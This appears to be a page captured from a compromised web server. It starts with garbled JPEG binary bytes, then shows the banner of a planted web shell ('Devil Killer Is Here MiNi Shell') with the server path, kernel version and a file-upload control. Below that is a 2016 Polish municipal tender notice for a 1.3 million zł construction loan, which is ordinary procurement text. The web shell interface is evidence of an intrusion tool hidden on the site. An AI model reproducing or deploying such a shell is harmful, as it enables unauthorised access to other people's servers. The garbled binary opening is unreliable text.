JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160628/107815-N-2016.html

<p class="kh_header"><b>Ostrów Wielkopolski: UDZIELENIE KREDYTU BANKOWEGO W WYSOKOŚCI 1.300.000,00 ZŁ
 NA BUDOWĘ BUDYNKU WIELORODZINNEGO 
PRZY UL. KLASZTORNEJ, DZIAŁKA 5/17 W OSTROWIE WIELKOPOLSKIM</b><br>
<b>Numer ogłoszenia: 107815 - 2016; data zamieszczenia: 28.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Gospodarki Mieszkaniowej "MZGM" Sp. z o.o. , ul. Kościuszki 14, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 62 7387090.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzgm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UDZIELENIE KREDYTU BANKOWEGO W WYSOKOŚCI 1.300.000,00 ZŁ
 NA BUDOWĘ BUDYNKU WIELORODZINNEGO 
PRZY UL. KLASZTORNEJ, DZIAŁKA 5/17 W OSTROWIE WIELKOPOLSKIM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Kwota kredytu: 1.300.000,00 PLN (słownie: jeden milion trzysta tysięcy złotych 00-100).
2)	Zabezpieczenie spłaty kredytu - hipoteka na nieruchomości przy ul. Klasztornej w Ostrowie Wielkopolskim, działka nr 5-17, obręb 0124, księga wieczysta KZ1W-00096508-8, cesja praw               z umowy - polisy ubezpieczeniowej, rachunek wyodrębnionych wpływów. 
3)	Termin wykorzystania kredytu - do dnia 30.11.2017 r. Zamawiający zastrzega prawo zmiany terminu wykorzystania kredytu, przy braku jednoczesnej zmiany okresu kredytowania. Ewentualna zmiana terminu wykorzystania kredytu nastąpi na pisemny wniosek Zamawiającego złożony z min 7 dniowym wyprzedzeniem.  
4)	Okres kredytowania do 30.11.2032 r.
5)	Kredyt udzielony zostanie w walucie polskiej i w takiej walucie będzie wykorzystywany.
6)	Wykonawca postawi do dyspozycji Zamawiającego środki kredytu w dniu podpisania umowy. 
Warunkiem uruchomienia kredytu (postawienia środków do dyspozycji Zamawiającego) będzie ustanowienie zabezpieczeń spłaty kredytu określonych w SIWZ. 
Od postawionych do dyspozycji środków kredytowych Wykonawca nie będzie pobierał żadnych dodatkowych opłat ani prowizji.
7)	Wykonawca uruchomi środki kredytu w wysokości i terminach wskazanych przez Zamawiającego w dyspozycjach składanych do Wykonawcy na maksymalnie 3 dni przed  terminem wypłaty kredytu, w transzach na rachunek wskazany w dyspozycji uruchomienia oraz wynikający z faktur związanych z realizacją budynku wielorodzinnego przy ul. Klasztornej, działka 5-17 do wartości brutto.
8)	Zamawiający dopuszcza możliwość zmiany dat oraz wysokości wypłaty transz kredytu. Zamawiający przewiduje wypłatę kredytu w następujących transzach:

do dnia 30.06.2017 r.  do kwoty     200.000,00    zł,
do dnia 31.07.2017 r.  do kwoty     400.000,00    zł, 
do dnia 31.08.2017 r.  do kwoty     600.000,00    zł,
do dnia 30.09.2017 r.  do kwoty     800.000,00    zł,
do dnia 31.10.2017 r.  do kwoty  1.100.000,00    zł,    
do dnia 30.11.2017 r.  do kwoty  1.300.000,00    zł.

9)	Zamawiający zobowiązuje się do ubezpieczenia nieruchomości w trakcie budowy                           i dostarczenia cesji praw z polisy ubezpieczeniowej nieruchomości na rzecz Wykonawcy                  w ciągu 60 dni od dnia podpisania umowy na roboty budowlane.  

10)	Do dyspozycji uruchomienia transzy kredytu załączona zostanie kopia faktury częściowej wykonanych prac związanych z realizacją budynku wielorodzinnego przy ul. Klasztornej, działka 5-17 (oryginały faktur do wglądu w siedzibie Zamawiającego lub przesyłane elektronicznie                 w formie pliku PDF). Wykonawca dokonywać będzie płatności za faktury wg wartości brutto, po uprzednim zaangażowaniu i udokumentowaniu przez Zamawiającego zaplanowanego udziału własnego w realizację przedmiotowej inwestycji. 
Zgodnie z art. 43 ust. 1 pkt 10 ustawy o podatku od towarów i usług MZGM Sp. z o.o. nie odlicza podatku VAT od inwestycji. 
11)	Prowizja i marża banku będą stałe w całym okresie kredytowania.
12)	Łączna kwota prowizji nie może być wyższa niż 1,0% kwoty uruchomionego kredytu. Prowizja płatna jednorazowo do dnia uruchomienia kredytu. 
13)	Od przekazania środków kredytowych Wykonawca nie będzie pobierał dodatkowych opłat.
14)	Zamawiającemu przysługiwać będzie prawo do rezygnacji z części kredytu bez dodatkowych opłat i prowizji.
15)	Kwota wykorzystanego kredytu będzie oprocentowana w stosunku rocznym według zmiennej stopy procentowej.
16)	Stopa procentowa o której mowa w pkt. 15 będzie równa wysokości stawki bazowej WIBOR 3M powiększonej o stałą marżę Wykonawcy, ustaloną na podstawie złożonej oferty i zmieniana                   w okresach kwartalnych wg zasad obowiązujących u Wykonawcy.
17)	Przy naliczaniu odsetek stosowany będzie kalendarz rzeczywisty.
18)	Jeżeli data spłaty kredytu i lub odsetek przypada na dzień ustawowo wolny od pracy uważa się że termin został zachowany, jeżeli spłata nastąpiła w pierwszym dniu roboczym po terminie określonym w umowie kredytu.
19)	O wysokości stawki bazowej (WIBOR 3M) stanowiącej podstawę obliczenia oprocentowania kredytu w danym miesiącu oraz o kwocie naliczonych odsetek za dany miesiąc, Zamawiający będzie powiadamiany pisemnie przez Wykonawcę.
20)	Wykonawca nie będzie pobierał dodatkowych opłat i prowizji w związku z ustanowionym zabezpieczeniem spłaty udzielonego kredytu.
Odsetki od zadłużenia kredytowego będą naliczane w miesięcznych okresach obrachunkowych zgodnie z faktyczną liczbą dni miesiąca kalendarzowego i płatne będą na podstawie informacji dostarczonej przez Bank, przy czym pierwsza spłata odsetek nastąpi w miesiącu następującym po miesiącu w którym uruchomiony został kredyt.
21)	Spłata rat kapitałowych nastąpi w okresach miesięcznych. Pierwsza rata kredytu                               w wysokości 7.262,00 zł. Kolejne 179 rat w wysokości 7.222,00 zł. Ostatnia spłata raty kapitałowej i odsetek nastąpi 30.11.2032 r.
22)	Spłata kredytu w systemie rat malejących.
23)	Zamawiający dopuszcza aby Wykonawca otworzył rachunek techniczny do obsługi kredytu najpóźniej w dniu zawarcia umowy kredytowej i prowadził go nieodpłatnie w okresie jej obowiązywania. Zamawiający przewiduje otwarcie rachunku podstawowego lub pomocniczego w Banku, który udzieli kredytu będącego przedmiotem SIWZ
24)	Zamawiający dopuszcza składanie dyspozycji przelewu na wzorze dyspozycji dostarczonego przez Wykonawcę.
25)	Zamawiającemu przysługuje prawo do przedterminowej spłaty całości lub części kredytu                 w terminie przez niego wskazanym, pod warunkiem uprzedniego pisemnego powiadomienia Wykonawcy, które zostanie doręczone za pośrednictwem poczty nie później niż na 30 dni przed datą wcześniejszej spłaty całości lub części kredytu.
26)	W przypadku dokonania przez Zamawiającego przedterminowej spłaty części kredytu od aneksu do umowy oraz przedterminowej spłaty części kredytu Wykonawca nie pobierze dodatkowych opłat.
27)	Wykonawcy nie przysługuje prawo naliczania i pobierania jakichkolwiek dodatkowych opłat                  i prowizji, za wyjątkiem prowizji od udzielenia kredytu, która będzie ustalona w umowie kredytowej, przy czym:
a) Zamawiający zastrzega sobie prawo do zmiany terminu wykorzystania kredytu w przypadku zmiany harmonogramu robót budowlanych. Wykonawca będzie zobowiązany do zmiany postanowień umowy kredytu na pisemne żądanie Zamawiającego z podaniem przyczyny przesunięcia. Wykonawcy nie będzie przysługiwać z tego tytułu jakiekolwiek roszczenie                        w stosunku do Zamawiającego, w szczególności jakakolwiek prowizja i lub opłata,
b) w przypadku zmiany terminu wykorzystania kredytu, zmianie ulec może także termin rozpoczęcia spłaty rat kapitałowych kredytu. 
28)	Zamawiający w wyniku zawarcia umowy ponosić będzie jedynie koszty udzielenia kredytu wynikające ze złożonej oferty (zawarte w formularzu ofertowym). Jakiekolwiek inne koszty związane z udzieleniem kredytu oraz jego obsługą ponosi Wykonawca.
29)	Zaświadczenia: ZUS, US oraz aktualne opinie bankowe nie starsze niż jeden miesiąc dostarczone zostaną niewykluczonemu Wykonawcy, który złoży najkorzystniejszą ofertę, przed podpisaniem umowy.
30)	Zamawiający dopuszcza możliwość finansowania przez Wykonawcę Kredytu z EBI.
31)	Do umowy kredytowej zostanie wprowadzone postanowienie, iż wszelkie postanowienia warunków ogólnych czy szczególnych umowy kredytowej, które są wprost sprzeczne                            z wymaganiami określonymi w SIWZ, lub też czynią te wymogi w pełni lub częściowo nieskutecznymi, będą uważane za nieistniejące w takim zakresie w jakim ograniczają skuteczność wymagań określonych w SIWZ
32)	Zamawiający do upływu terminu składania ofert, na każde żądanie Wykonawcy ubiegającego się o udzielenie niniejszego zamówienia udostępni ocenę ekonomiczną zadania inwestycyjnego pn. Budowa budynku wielorodzinnego w Ostrowie Wielkopolskim przy ul. Klasztornej, działka 5-17..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2032.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.   Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 5.000,00 zł (słownie: 
pięćtysięcy 00-100 zł.).
Wadium należy wnieść przed upływem terminu składania ofert określonym w punkcie I niniejszej SIWZ - dotyczy również wadium składanego w formie pieniężnej.


2.   Formę wniesienia wadium wybiera Wykonawca spośród przewidzianych w art. 45, ust. 6 ustawy Pzp. Wadium może być wnoszone w jednej lub w kilku następujących formach:

w pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,	
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r.  o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr 42, poz. 275, z 2008r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010r. Nr 96, poz. 620).
      
       Wadium wnoszone w formie pieniężnej należy wnieść przelewem na konto:
17 1020 2267 0000 4302 0002 1782 PKO Bank Polski SA 
z dopiskiem Wadium w przetargu na kredyt.

Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.

W przypadku wnoszenia wadium w innych formach niż pieniężna oryginał dowodu ich wniesienia należy załączyć do oferty w osobnej koszulce. 

Wydruk lub kserokopie dowodu wniesienia wadium, np. dowód przelania pieniędzy na konto Zamawiającego czy gwarancję bankową należy wpiąć trwale do oferty.

W przypadku wnoszenia wadium w formie gwarancji lub poręczenia przez wykonawców wspólnie ubiegających się o udzielenie zamówienia konieczne jest wymienienie w ich treści wszystkich wykonawców w sytuacji, gdy składają oni jeden wspólny dokument.

3.	Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako       najkorzystniejsza, z zastrzeżeniem pkt. 7.
4. Zamawiający zwróci wadium Wykonawcy, którego oferta została wybrana jako najkorzystniejsza niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia      należytego wykonania umowy, jeżeli jego wniesienie żądano.
5. Zamawiający zwróci niezwłocznie wadium , na wniosek wykonawcy, który wycofa ofertę przed upływem terminu składania ofert.
6. Jeżeli Wykonawca wniesie wadium w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
7. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli:
   a) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26, ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25, ust. 1 ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24, ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, 
    b) Wykonawca nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87, ust. 2 kt 3, co           spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.

8. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
b)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) Wzór umowy kredytowej uwzględniającej istotne postanowienia umowne zawarte                       w niniejszej SIWZ. Umowa ta nie może zawierać postanowień, warunków ogólnych czy szczególnych które są sprzeczne z wymaganiami określonymi w SIWZ, lub też czynią te wymogi w pełni lub częściowo nieskutecznymi.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	wypełniony i podpisany Formularz Ofertowy ,
2.	dowód wniesienia wadium (w przypadku wnoszenia wadium w formie niepieniężnej - kopię dokumentu należy wpiąć do oferty a oryginał w osobnej -koszulce należy dołączyć do oferty; w przypadku dokonania przelewu - należy wpiąć do oferty ksero dowodu przelewu),
3.	harmonogram spłat rat kapitałowych i odsetek na podstawie którego obliczono cenę oferty,
4.	pełnomocnictwo - jeżeli osoba-osoby podpisujące ofertę działają na jego podstawie,
5.	dokument ustanawiający pełnomocnika w przypadku składania oferty wspólnej (art. 23 ustawy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Termin uruchomienia transzy kredytu - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszczalna jest zmiana umowy polegająca na zmianie danych Wykonawcy bez zmiany samego Wykonawcy (np. zmiana siedziby, adresu,).
2.	Dopuszczalne jest obniżenie wynagrodzenia Wykonawcy przy zachowaniu zakresu jego świadczenia umownego.
3.	Dopuszczalna jest zmiana świadczenia Wykonawcy na lepszej jakości przy zachowaniu tożsamości przedmiotu zamówienia.
4.	Dopuszczalna jest zmiana terminu wykorzystania kredytu w przypadku zmiany harmonogramu robót budowlanych. Wykonawca będzie zobowiązany do zmiany postanowień umowy kredytu na pisemne żądanie Zamawiającego z podaniem przyczyny przesunięcia. 
5.	Dopuszczalna jest zmiana terminu wykorzystania kredytu, przy braku jednoczesnej zmiany okresu kredytowania. Ewentualna zmiana terminu wykorzystania kredytu nastąpi na pisemny wniosek Zamawiającego złożony z min 7 dniowym wyprzedzeniem.
6.	Dopuszczalna jest możliwość zmiany dat oraz wysokości wypłaty transz kredytu.
7.	Dopuszczalna jest zmiana dotycząca rezygnacji z części kredytu bez dodatkowych opłat i prowizji.
8.	Dopuszczalna jest zmiana dotycząca prawa do przedterminowej spłaty całości lub części kredytu w terminie przez niego wskazanym, pod warunkiem uprzedniego pisemnego powiadomienia Wykonawcy, które zostanie doręczone za pośrednictwem poczty nie później niż na 30 dni przed datą wcześniejszej spłaty całości lub części kredytu
9.	Dopuszczalna jest zmiana harmonogram spłaty kredytu w przypadku dokonania przez Zamawiającego przedterminowej spłaty części kredytu. 
10.	Zmiany umowy wymagają formy pisemnej w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzgm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zakład Gospodarki Mieszkaniowej, ul. Kościuszki 14, 63-400 Ostrów Wielkopolski..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.08.2016 godzina 12:00, miejsce: Miejski Zakład Gospodarki Mieszkaniowej, ul. Kościuszki 14, 63-400 Ostrów Wielkopolski, sekretariat Spółki, II piętro w godz. 7:00 - 15:00.</p>
